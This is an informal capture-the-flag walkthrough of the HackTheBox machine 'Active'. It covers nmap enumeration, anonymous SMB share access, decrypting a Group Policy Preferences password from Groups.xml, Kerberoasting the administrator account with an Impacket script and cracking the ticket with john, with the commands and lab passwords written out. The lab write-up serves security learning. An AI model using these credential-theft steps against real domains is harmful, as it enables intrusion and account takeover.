Machine IP-

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019–09–20 10:29:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
OS:N%T=80%CD=Z)Uptime guess: 0.020 days (since Fri Sep 20 15:35:10 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Here have to do host enumeration because we are not having any HTTP port form where we can gather information , so let’s start enumerating with SMBCLIENT (port 139)
smbclient -L
Here we get to see some share now let’s move in to get some information in Users share as it allows anonymous login
smb: \active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\machine\Preferences\Groups\Groups.xmlHere this Group.xml is having some information which can help us getting in
In Groups.xml we found hashes for user “SVC_TGS” cracked hashes with the help of gpp-decrypt

Here we got out password and now we are going find a way to move in with smbclient using the password and the user SVC_TGS
smbclient \\\\\\Users -U SVC_TGSAnd enter the password we got from gpp-decrypt

And here we got out user.txt
let’s enumurate further for getting root user , at nmap we see that kpasswd5 port to be open which seems to be very unique , after searching about this service while searching i get to see that it’s a type of encryption and we can gain the hashes with the help of “” tool having Kerberoasting method used to steal service account credentials
python /usr/share/doc/python-impacket/examples/ -request -dc-ip ACTIVE.HTB/SVC_TGSAnd enter the password "GPPstillStandingStrong2k18"

Here we got the administrator hash
Here Kerberos uses “krb5tgs” encryption , so decrypting it with john
- First copy the hash in a text file — (admin-hash)
- Use john to decrypt { john admin-hash — format=krb5tgs — wordlist=/usr/share/wordlists/rockyou.txt }
- And found the password as “Ticketmaster1968”
- Let’s connect to smb users share with administrator creds

And here we are having our administrator user
Found root flat at
